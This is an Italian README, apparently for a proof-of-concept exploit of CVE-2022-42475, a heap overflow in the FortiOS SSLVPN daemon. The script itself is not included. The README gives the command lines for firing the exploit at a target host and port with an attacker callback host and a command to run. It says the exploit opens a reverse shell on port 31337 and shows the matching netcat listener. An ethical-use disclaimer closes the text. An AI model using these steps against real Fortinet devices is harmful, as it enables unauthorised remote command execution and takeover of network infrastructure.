
Vulnerabilità di buffer overflow in FortiOS
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 Codice POC per sfruttare l'heap overflow nel demone SSLVPN di Fortinet
Questo è un POC rapido e sporco che probabilmente non funzionerà da nessuna parte a meno che tu non sia estremamente fortunato. Dipende dalla versione e contiene alcuni offset hardcoded che molto probabilmente cambieranno da un sistema all'altro.
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
Il POC utilizza un comando python per impostare una reverse shell sulla porta 31337
nc -lvnp 31337
Questo progetto è realizzato solo per scopi educativi e di test etici. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.
Grazie a Alain M - Twitter : @plopz0r